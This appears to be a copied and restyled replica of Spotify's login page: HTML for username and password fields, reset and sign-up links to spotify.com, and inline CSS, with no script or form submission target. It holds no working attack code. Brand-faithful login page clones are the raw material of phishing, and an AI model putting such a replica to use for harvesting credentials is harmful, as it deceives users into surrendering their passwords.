
<div class="parent-content">
<div class="content">
<!--     
        <div class="row-facebook">
          
            <a ng-href="" class="btn btn-facebook ng-binding"> Log in with facebook</a>
        </div> -->
    
        <div class="divider-container">
            <div class="divider">
              <strong class="divider-text">----or----</strong>
            </div>
        </div>
    

        <form >
          <!-- ngIf: status && status !== 200 -->
    
          <div class="row" >
           
              <label for="login-username" class="control-label">
              </label>
              <input  type="text" class="login-input" name="username" id="login-username" placeholder="Email address or username" autocapitalize="off" autocomplete="off" autocorrect="off" autofocus="autofocus">
            
          </div>
    
          <div class="row">
           
              <label for="login-password" class="control-label sr-only ng-binding">
              </label>
              <input type="password" class="login-password ng-untouched ng-empty ng-invalid ng-invalid-required" name="password" id="login-password" placeholder="Password" required="" autocomplete="off" ng-trim="false">
        
          </div>
    
          <!-- ------------------ ngIf: showAutomationKey -->
    
          <div class="row row-submit">
            
              <div class="checkbox-cont">
                  <!-- <input type="checkbox" name="remember" id="login-remember" class="ng-pristine ng-untouched ng-valid ng-not-empty">
                  Remember me </input> -->
                  <span class="control-indicator"></span>
              </div>
            
                <div class="login-button">
                    <span class="btn-log" > Log In</span>
                </div>

          </div>
        </form>

        
        <!---------------------------------------------------->
                <!---------------------------------------------------->

                        <!---------------------------------------------------->

        <div class="row">
          <div class="col-xs-12 text-center">
            <p>
              <a id="reset-password-link" ng-href="https://www.spotify.com/password-reset/" analytics-on="click" analytics-category="Login View" analytics-event="Forgot Button" analytics-label="" class="ng-binding" href="https://www.spotify.com/password-reset/">Forgot your password?</a>
            </p>
          </div>
        </div>
    
        <div id="sign-up-section">
          <div class="row">
            <div class="col-xs-12">
              <div ng-controller="SignUpController" class="ng-scope">
                <!-- ngInclude: 'signup.ngt' --><div ng-include="'signup.ngt'" class="ng-scope"><!-- ngIf: showSignup --><div ng-if="showSignup" class="ng-scope">
        <div class="row">
            <div class="col-xs-12">
                <div class="divider">
                    <!-- ngIf: orLabelVisible -->
                </div>
            </div>
        </div>
        <div class="row text-center mt-0">
            <div class="h4 ng-binding">Don't have an account?</div>
        </div>
        <div>
            <div class="row">
                <div class="col-xs-12">
                    <a id="sign-up-link" ng-href="https://www.spotify.com/signup/?forward_url=https%3A%2F%2Faccounts.spotify.com%2Fen%2Fstatus" class="btn btn-block btn-default ng-binding" role="button" href="https://www.spotify.com/signup/?forward_url=https%3A%2F%2Faccounts.spotify.com%2Fen%2Fstatus">Sign up for Spotify</a>
                </div>
            </div>
        </div>
    </div><!-- end ngIf: showSignup -->
    
    <!-- ngIf: showAppStoreBanner --></div>
              </div>
            </div>
          </div>
        </div>
    
    
        <div class="row">
          <div class="col-xs-12">
            <div class="divider"></div>
            <p class="text-muted disclaimer text-center ng-binding" ng-bind-html="'loginTermsOfService' | localize:termsAndConditionsUrl:privacyPolicyUrl">If you click "Log in with Facebook" and are not a Spotify user, you will be registered and you agree to Spotify's <a href="https://www.spotify.com/legal/end-user-agreement/plain/" target="_blank">Terms &amp; Conditions</a> and <a href="https://www.spotify.com/legal/privacy-policy/plain/" target="_blank">Privacy Policy</a>.</p>
          </div>
        </div>
      </div>

    </div>

      <style> 
      
      .checkbox-cont{
        padding-top: 10px;
      }

      .btn-log{
          padding-bottom: 10px;
      }


      .login-button:hover{
        background-color: rgb(35, 223, 100);

    }

      .login-button{
        margin-left: 72px;
        height: 100px;
        color: white;
        text-decoration: none;
        font-size: 14px;
        line-height: 0.5;
        border-radius: 500px;
         padding: 16px 42px 18px;
         height: 40px;
         transition-duration: .3s;
        background-color: #1DB954;
        border-width: 0;
        letter-spacing: 2px;
        width: 200px;
    text-transform: uppercase;
    white-space: normal;   
     display: inline-block;
    margin-bottom: 0;
    font-weight: 700;
    text-align: center;
    cursor: pointer;
    background-image: none;
    border: 1px solid transparent;
    box-sizing: border-box;
      }

      .row-submit{
          display: flex;
      }
      .login-input , .login-password{
        display: block;
    font-size: 16px;
    line-height: 1.5;
    color: #222326;
    width: 300px;
    margin-bottom: 20px;
    /* padding-bottom: 20px; */
      }


 

      /* .demologin-div{
          padding-bottom: 70px;

      } */
      
      .parent-content {
          display: flex;
          justify-content:  center;
      }
      
      .content{
          padding-left: 400px;
      }
      </style>